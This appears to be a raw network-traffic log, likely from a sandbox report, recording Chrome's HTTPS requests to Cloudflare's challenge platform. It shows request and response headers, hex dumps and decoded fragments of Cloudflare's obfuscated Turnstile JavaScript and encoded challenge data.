                                                                            11192.168.2.449751104.18.94.414431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:19 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d9998e48bc0e98b&lang=auto HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:20 UTC331INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:19 GMT
                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                            Content-Length: 126156
                                                                            Connection: close
                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d9998f8dbf66bba-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:20 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 76 45 73 72 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70
                                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.vEsr2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"http
                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74
                                                                            Data Ascii: %20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_timeout":"Timed%20out","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnst
                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 35 38 32 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 39 39 38 29 29 2f 38 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 37 35 32 29 29 2f 39 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 37 31 38 33 30 32 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 35 30 34 29 5d 2c 65 4d 5b 67 4c 28 31 38 39 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 57 2c 65 29 7b 65 3d 28 67 57 3d 67 4c 2c 7b 27 52 6f 59 4f 59 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 7d 29 3b 74 72 79 7b 72 65 74
                                                                            Data Ascii: )/6+-parseInt(gK(582))/7+parseInt(gK(998))/8*(-parseInt(gK(752))/9),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,718302),eM=this||self,eN=eM[gL(504)],eM[gL(1896)]=function(c,gW,e){e=(gW=gL,{'RoYOY':function(g,h){return g(h)}});try{ret
                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 6a 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 4c 49 77 79 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 59 62 6c 48 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 6d 79 6e 51 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 78 6c 65 70 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 6f 67 44 6c 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 4f 6a 51 53 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 53 74 65 76 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69
                                                                            Data Ascii: jp':function(h,i){return i&h},'LIwyt':function(h,i){return i*h},'YblHR':function(h,i){return i&h},'mynQT':function(h,i){return h<i},'xlepD':function(h,i){return i!=h},'ogDld':function(h,i){return h<i},'OjQSu':function(h,i){return h<i},'StevG':function(h,i
                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 43 3d 28 44 2d 2d 2c 64 5b 68 30 28 37 37 35 29 5d 28 30 2c 44 29 26 26 28 44 3d 4d 61 74 68 5b 68 30 28 31 31 33 37 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 78 5b 4c 5d 3d 45 2b 2b 2c 64 5b 68 30 28 36 35 34 29 5d 28 53 74 72 69 6e 67 2c 4b 29 29 7d 69 66 28 64 5b 68 30 28 31 35 39 35 29 5d 28 27 27 2c 43 29 29 7b 69 66 28 4f 62 6a 65 63 74 5b 68 30 28 31 34 35 36 29 5d 5b 68 30 28 36 31 30 29 5d 5b 68 30 28 35 38 35 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 68 30 28 31 35 38 35 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 49 3d 3d 64 5b 68 30 28 38 36 30 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 68 30 28 39 37 33 29 5d 28 6f 28 48 29 29 2c 48 3d 30
                                                                            Data Ascii: ,H=0):I++,M>>=1,s++);C=(D--,d[h0(775)](0,D)&&(D=Math[h0(1137)](2,F),F++),x[L]=E++,d[h0(654)](String,K))}if(d[h0(1595)]('',C)){if(Object[h0(1456)][h0(610)][h0(585)](B,C)){if(256>C[h0(1585)](0)){for(s=0;s<F;H<<=1,I==d[h0(860)](j,1)?(I=0,G[h0(973)](o(H)),H=0
                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 3d 45 2c 45 2b 3d 31 29 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 33 28 31 31 33 37 29 5d 28 32 2c 32 29 2c 46 3d 31 3b 64 5b 68 33 28 35 34 36 29 5d 28 46 2c 4b 29 3b 4c 3d 47 26 48 2c 48 3e 3e 3d 31 2c 64 5b 68 33 28 31 31 38 34 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 68 33 28 31 36 38 33 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 33 28 31 31 33 37 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 68 33 28 39 36 38 29 5d 28 46 2c 4b 29 3b 4c 3d 64 5b 68 33 28 38 38 31 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 33 28 35 34 31 29 5d 28 6f
                                                                            Data Ascii: =E,E+=1);for(J=0,K=Math[h3(1137)](2,2),F=1;d[h3(546)](F,K);L=G&H,H>>=1,d[h3(1184)](0,H)&&(H=j,G=o(I++)),J|=(d[h3(1683)](0,L)?1:0)*F,F<<=1);switch(J){case 0:for(J=0,K=Math[h3(1137)](2,8),F=1;d[h3(968)](F,K);L=d[h3(881)](G,H),H>>=1,0==H&&(H=j,G=d[h3(541)](o
                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 5b 67 4c 28 31 37 30 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 2c 68 37 2c 6f 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 66 28 68 37 3d 67 4c 2c 6f 3d 7b 27 47 50 43 43 77 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 63 64 52 64 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 69 53 42 4e 64 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 53 46 46 4f 66 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 2c 4a 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 2c 4a 29 7d 2c 27 64 59 59 6d 55 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 55 73 4e 55 58 27 3a 68 37 28 31 33 33 31 29
                                                                            Data Ascii: [gL(1704)]=function(g,h,i,j,h7,o,x,B,C,D,E,F){if(h7=gL,o={'GPCCw':function(G,H){return G<H},'cdRdm':function(G,H){return G+H},'iSBNd':function(G,H){return G(H)},'SFFOf':function(G,H,I,J){return G(H,I,J)},'dYYmU':function(G,H){return G(H)},'UsNUX':h7(1331)
                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 45 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 7d 2c 6a 3d 4f 62 6a 65 63 74 5b 68 61 28 31 36 37 37 29 5d 28 68 29 2c 6b 3d 30 3b 6b 3c 6a 5b 68 61 28 31 30 39 31 29 5d 3b 6b 2b 2b 29 69 66 28 6c 3d 6a 5b 6b 5d 2c 27 66 27 3d 3d 3d 6c 26 26 28 6c 3d 27 4e 27 29 2c 67 5b 6c 5d 29 7b 66 6f 72 28 6d 3d 30 3b 69 5b 68 61 28 31 38 31 31 29 5d 28 6d 2c 68 5b 6a 5b 6b 5d 5d 5b 68 61 28 31 30 39 31 29 5d 29 3b 2d 31 3d 3d 3d 67 5b 6c 5d 5b 68 61 28 38 34 34 29 5d 28 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 26 26 28 69 5b 68 61 28 31 35 37 36 29 5d 28 65 59 2c 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 7c 7c 67 5b 6c 5d 5b 68 61 28 39 37 33 29 5d 28 27 6f 2e 27 2b 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 29 2c 6d 2b 2b 29 3b 7d 65 6c 73 65 20 67 5b
                                                                            Data Ascii: E':function(n,o){return n(o)}},j=Object[ha(1677)](h),k=0;k<j[ha(1091)];k++)if(l=j[k],'f'===l&&(l='N'),g[l]){for(m=0;i[ha(1811)](m,h[j[k]][ha(1091)]);-1===g[l][ha(844)](h[j[k]][m])&&(i[ha(1576)](eY,h[j[k]][m])||g[l][ha(973)]('o.'+h[j[k]][m])),m++);}else g[
                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 68 64 28 34 38 38 29 5d 3d 68 64 28 31 38 31 38 29 2c 6a 5b 68 64 28 38 31 31 29 5d 3d 68 64 28 31 35 37 37 29 2c 6a 5b 68 64 28 31 36 38 34 29 5d 3d 68 64 28 35 37 30 29 2c 6a 5b 68 64 28 38 38 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 68 64 28 31 38 33 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 29 3b 74 72 79 7b 69 66 28 6c 3d 65 5a 28 67 5b 68 64 28 31 36 37 31 29 5d 2c 67 5b 68 64 28 38 33 38 29 5d 29 2c 6b 5b 68 64 28 31 34 34 39 29 5d 28 67 5b 68 64 28 31 36 37 31 29 5d 2c 45 72 72 6f 72 29 3f 67 5b 68 64 28 31 36 37 31 29 5d 3d 4a 53 4f 4e 5b 68 64 28 31 31 37 35 29 5d 28 67 5b 68 64 28 31 36 37
                                                                            Data Ascii: H){return G+H},j[hd(488)]=hd(1818),j[hd(811)]=hd(1577),j[hd(1684)]=hd(570),j[hd(889)]=function(G,H){return G+H},j[hd(1839)]=function(G,H){return G+H},j);try{if(l=eZ(g[hd(1671)],g[hd(838)]),k[hd(1449)](g[hd(1671)],Error)?g[hd(1671)]=JSON[hd(1175)](g[hd(167
                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 7d 2c 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 3f 28 66 3d 64 5b 68 65 28 36 39 34 29 5d 2c 64 5b 68 65 28 31 31 33 33 29 5d 26 26 65 5b 68 65 28 31 36 35 39 29 5d 28 74 79 70 65 6f 66 20 64 5b 68 65 28 31 31 33 33 29 5d 2c 65 5b 68 65 28 31 34 33 31 29 5d 29 29 26 26 28 65 5b 68 65 28 37 34 32 29 5d 3d 3d 3d 68 65 28 31 31 30 33 29 3f 6a 5b 68 65 28 39 34 39 29 5d 26 26 28 6f 3d 7b 7d 2c 6f 5b 68 65 28 31 37 37 30 29 5d 3d 68 65 28 37 31 33 29 2c 6f 5b 68 65 28 39 32 33 29 5d 3d 78 5b 68 65 28 31 39 32 32 29 5d 5b 68 65 28 31 37 37 36 29 5d 2c 6f 5b 68 65 28 31 31 32 30 29 5d 3d 68 65 28 34 39 35 29 2c 6f 5b 68 65 28 31 38 39 38 29 5d 3d 42 5b 68 65 28 31 39 32 32 29 5d
                                                                            Data Ascii: n(n,o,s){return n(o,s)}},d instanceof Error)?(f=d[he(694)],d[he(1133)]&&e[he(1659)](typeof d[he(1133)],e[he(1431)]))&&(e[he(742)]===he(1103)?j[he(949)]&&(o={},o[he(1770)]=he(713),o[he(923)]=x[he(1922)][he(1776)],o[he(1120)]=he(495),o[he(1898)]=B[he(1922)]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.449752104.18.95.414431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:19 UTC1149OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/101271322:1730103188:6HRbbJs87_HiCSIrxrZZgbsUH28xnY_4sVI_cjvAKEk/8d9998e48bc0e98b/S8ymOwDctYV1XFZLWDWFqSNHTXkEi0WpttSETzX6a4Y-1730104576-1.1.1.1-_4T1_B3uixuUg0D4_NLdSkm6NbVh1yndlqULNzvY0xOHel8g6vvphEUB.BRwm5rE HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Content-Length: 3281
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            Content-type: application/x-www-form-urlencoded
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            CF-Challenge: S8ymOwDctYV1XFZLWDWFqSNHTXkEi0WpttSETzX6a4Y-1730104576-1.1.1.1-_4T1_B3uixuUg0D4_NLdSkm6NbVh1yndlqULNzvY0xOHel8g6vvphEUB.BRwm5rE
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Origin: https://challenges.cloudflare.com
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50l31/0x4AAAAAAAySkc1zVXc3ztAP/auto/fbE/normal/auto/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:19 UTC3281OUTData Raw: 76 5f 38 64 39 39 39 38 65 34 38 62 63 30 65 39 38 62 3d 37 6d 5a 77 39 77 64 77 6e 77 52 77 25 32 62 77 73 56 55 7a 56 54 55 34 77 49 4d 62 42 53 4b 55 51 55 6b 36 77 7a 6f 77 55 75 5a 55 79 77 34 42 4e 43 55 6c 77 4e 4d 42 77 54 4b 34 5a 55 4b 77 2d 6d 4b 4e 35 55 37 56 76 55 49 43 45 31 77 2d 37 6f 2b 57 53 77 55 24 30 45 5a 55 73 55 62 6f 24 45 31 55 73 4d 55 6a 2d 4e 5a 51 47 54 55 61 41 51 4e 41 6b 55 37 5a 55 57 55 34 5a 45 61 70 55 2d 4d 6a 55 32 34 42 78 74 62 55 24 45 47 74 57 4c 79 76 4b 73 73 56 76 55 5a 32 65 70 4b 39 68 24 55 54 41 55 53 42 75 43 70 77 2d 44 4e 7a 49 5a 45 35 30 50 79 4d 4d 55 4b 7a 35 78 4b 39 38 52 32 6f 4b 30 55 2d 4e 62 55 4e 65 53 55 2d 41 55 4e 5a 55 69 42 73 76 24 53 75 55 32 77 2d 65 4b 55 75 55 6d 30 56 59 72 4a 68
                                                                            Data Ascii: v_8d9998e48bc0e98b=7mZw9wdwnwRw%2bwsVUzVTU4wIMbBSKUQUk6wzowUuZUyw4BNCUlwNMBwTK4ZUKw-mKN5U7VvUICE1w-7o+WSwU$0EZUsUbo$E1UsMUj-NZQGTUaAQNAkU7ZUWU4ZEapU-MjU24BxtbU$EGtWLyvKssVvUZ2epK9h$UTAUSBuCpw-DNzIZE50PyMMUKz5xK98R2oK0U-NbUNeSU-AUNZUiBsv$SuU2w-eKUuUm0VYrJh
                                                                            2024-10-28 08:36:20 UTC747INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:20 GMT
                                                                            Content-Type: text/plain; charset=UTF-8
                                                                            Content-Length: 149676
                                                                            Connection: close
                                                                            cf-chl-gen: Il67N3eHGx27emKp1ZoP+xtkc8ERA0qme/IbOjgQkPFpsz8z6mBi4AgGZDTWpJDAzZG+fVdT21BgpWTtIRX6w53S5jO38ZKRoyI7Zjj/K0WYIz7KOerK+nbwZmSMYyi4xylyRLu6veITsRb1ypPyoCZlYr6cvlAyTJfVi8s5hIAnHC8iopBPY9ti18sp5go4EBe5LTVMDGtR5eKM2I7Z5xAG5Eh4xQarhWtSSVT/VIMlD7nZ+xVBzhRm7WGGJWgx0IwAnnOi2yXCm5wVsyt6RpYrK/c1/dug0bPygdISL4IjdhrNAx+00Upx9qXVmahAoLEeHabpMgCwr23F7l/8kQfrg8FbAYJa+ua1XuHKb/lJsgGwWuHHDIT3gwW8XRjq/Z6IeVXjrH/6IbFXeO6tDKnqXA15HcCh2JfjvtR7dzj0LuMYL0pCFwtEoeIJgbPpesb8gMHsCgiv6wpbo1M+j1fxqL57eIef+S7QDIurDEF2+CE=$b4u91sfuS+Dqb3sY
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d9998fac8fbe766-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:20 UTC622INData Raw: 6c 37 6c 35 75 34 43 32 6e 72 6d 4a 75 38 65 4e 30 73 6d 77 77 62 47 79 30 71 69 77 7a 4d 36 31 7a 64 43 6e 72 5a 2b 69 33 39 4c 6c 70 62 37 44 73 39 6e 6a 37 64 6a 4f 74 2b 76 4a 71 65 4c 50 34 4e 54 74 36 4c 58 54 79 74 76 33 75 72 79 39 73 2f 6e 73 34 66 76 63 35 2f 44 57 39 76 6a 6b 44 76 77 44 33 65 6a 69 35 65 41 4b 39 64 54 35 42 78 45 59 35 67 2f 57 46 39 73 64 44 52 6f 47 34 52 50 76 43 75 55 58 4a 53 48 37 47 79 55 78 37 79 73 74 4c 67 63 54 39 79 67 6f 4d 68 59 64 4b 77 6b 63 2f 53 41 79 49 7a 46 46 4d 54 30 5a 41 6a 56 42 47 30 74 51 49 45 4d 68 48 41 35 46 43 43 77 72 54 6b 73 32 44 6b 34 32 48 6b 68 54 54 43 4a 55 54 30 5a 5a 56 68 39 43 4e 79 51 2f 52 58 42 62 50 45 70 6d 64 45 42 44 62 48 5a 32 4d 57 70 57 58 6c 39 49 54 58 53 44 57 31 4a
                                                                            Data Ascii: l7l5u4C2nrmJu8eN0smwwbGy0qiwzM61zdCnrZ+i39Llpb7Ds9nj7djOt+vJqeLP4NTt6LXTytv3ury9s/ns4fvc5/DW9vjkDvwD3eji5eAK9dT5BxEY5g/WF9sdDRoG4RPvCuUXJSH7GyUx7ystLgcT9ygoMhYdKwkc/SAyIzFFMT0ZAjVBG0tQIEMhHA5FCCwrTks2Dk42HkhTTCJUT0ZZVh9CNyQ/RXBbPEpmdEBDbHZ2MWpWXl9ITXSDW1J
                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 4e 75 65 32 61 55 62 58 32 4a 62 47 42 77 58 61 47 6b 70 71 52 30 6e 32 57 70 65 58 5a 74 68 6f 69 69 61 62 47 4c 71 37 47 43 6f 35 4b 73 72 4a 61 31 70 35 5a 36 67 4a 64 38 73 6f 47 76 76 6f 57 48 6b 35 32 61 79 71 6d 50 70 5a 43 39 6a 73 62 42 32 4a 6a 52 6c 36 2f 50 6e 63 71 74 73 64 33 67 72 4b 33 56 70 72 6d 2f 77 64 75 38 32 4b 66 63 77 73 7a 43 36 75 2f 48 37 66 58 70 35 63 61 36 32 62 7a 6e 39 2f 76 57 76 41 50 68 7a 64 62 41 2f 75 6e 46 79 4f 77 44 34 4d 73 43 35 38 76 52 45 75 58 78 38 42 44 33 30 75 76 75 35 2f 30 4f 38 64 6a 39 31 42 50 62 2f 43 45 59 34 53 6b 55 43 76 72 73 43 66 72 75 45 69 34 47 46 51 4d 70 47 4f 38 70 4b 42 77 5a 4f 50 63 56 2f 42 52 43 50 68 37 38 46 78 41 47 49 68 59 57 4e 54 73 33 43 44 30 4f 4d 44 49 50 53 46 45 70 51
                                                                            Data Ascii: Nue2aUbX2JbGBwXaGkpqR0n2WpeXZthoiiabGLq7GCo5KsrJa1p5Z6gJd8soGvvoWHk52ayqmPpZC9jsbB2JjRl6/Pncqtsd3grK3Vprm/wdu82KfcwszC6u/H7fXp5ca62bzn9/vWvAPhzdbA/unFyOwD4MsC58vREuXx8BD30uvu5/0O8dj91BPb/CEY4SkUCvrsCfruEi4GFQMpGO8pKBwZOPcV/BRCPh78FxAGIhYWNTs3CD0OMDIPSFEpQ
                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 62 6a 56 75 68 64 32 32 50 6f 5a 43 44 6f 36 46 38 6f 58 65 6b 65 36 79 53 6e 47 31 31 6e 35 43 71 6c 71 71 35 70 72 71 35 6a 59 68 7a 65 59 2f 44 66 6f 43 76 76 4b 43 48 72 4a 76 42 6d 36 2b 65 77 4d 4b 7a 6b 73 72 51 77 72 53 58 6d 4c 57 53 30 4d 36 57 6d 61 6d 72 74 75 4b 38 33 4d 53 61 33 38 47 38 78 63 71 6e 38 4d 2f 78 35 65 6a 56 74 4d 72 4d 30 4f 48 37 37 4f 58 4c 35 76 62 67 32 2f 7a 38 77 39 76 7a 39 51 4c 46 34 66 77 4f 78 2b 6e 61 34 77 44 72 79 65 50 6d 43 64 44 58 7a 2f 41 4d 43 2f 33 36 47 64 59 5a 31 4e 73 47 32 79 6a 6e 2f 68 54 32 36 43 67 4d 43 65 37 36 44 69 45 69 44 41 30 31 42 65 6f 71 2b 54 67 6d 48 44 48 32 2f 53 30 43 4e 50 77 6e 4d 68 38 48 52 45 4a 4a 4a 45 45 69 4c 68 6b 74 44 56 4d 2f 46 43 41 52 4c 6c 73 78 57 44 49 39 53 6d
                                                                            Data Ascii: bjVuhd22PoZCDo6F8oXeke6ySnG11n5Cqlqq5prq5jYhzeY/DfoCvvKCHrJvBm6+ewMKzksrQwrSXmLWS0M6WmamrtuK83MSa38G8xcqn8M/x5ejVtMrM0OH77OXL5vbg2/z8w9vz9QLF4fwOx+na4wDryePmCdDXz/AMC/36GdYZ1NsG2yjn/hT26CgMCe76DiEiDA01Beoq+TgmHDH2/S0CNPwnMh8HREJJJEEiLhktDVM/FCARLlsxWDI9Sm
                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 6c 47 4e 67 6f 34 69 66 65 71 35 6d 6d 35 35 79 71 34 61 42 63 61 32 78 70 6f 57 77 74 4b 57 77 6b 4b 32 72 75 72 32 44 6f 4d 47 6d 74 4c 53 6d 68 36 69 4c 6a 4b 71 39 78 4d 4b 4c 73 70 32 66 71 39 61 77 30 4c 6d 57 31 35 69 77 72 35 32 31 76 37 66 41 6f 4c 2b 6a 31 73 62 73 35 65 66 61 70 63 66 63 78 63 2f 4d 30 50 50 7a 34 72 4b 30 73 37 6e 54 2f 72 58 76 30 74 66 51 38 4e 61 34 43 50 4c 62 2f 63 63 47 42 73 72 6f 34 76 41 42 37 65 6e 52 35 2b 51 49 30 65 49 4e 43 75 7a 78 38 42 55 42 42 42 4c 6b 44 78 49 69 43 75 4c 63 4b 75 62 36 2f 50 77 74 4d 78 54 71 48 54 4d 58 4d 68 49 43 43 2f 54 33 44 7a 34 4d 46 52 6b 54 52 52 34 46 47 41 51 47 46 45 56 4e 46 53 30 6f 43 54 77 65 4c 55 39 50 4b 55 6b 4f 45 69 74 53 4e 56 6f 59 58 42 63 38 4f 69 46 59 4c 79 55
                                                                            Data Ascii: lGNgo4ifeq5mm55yq4aBca2xpoWwtKWwkK2rur2DoMGmtLSmh6iLjKq9xMKLsp2fq9aw0LmW15iwr521v7fAoL+j1sbs5efapcfcxc/M0PPz4rK0s7nT/rXv0tfQ8Na4CPLb/ccGBsro4vAB7enR5+QI0eINCuzx8BUBBBLkDxIiCuLcKub6/PwtMxTqHTMXMhICC/T3Dz4MFRkTRR4FGAQGFEVNFS0oCTweLU9PKUkOEitSNVoYXBc8OiFYLyU
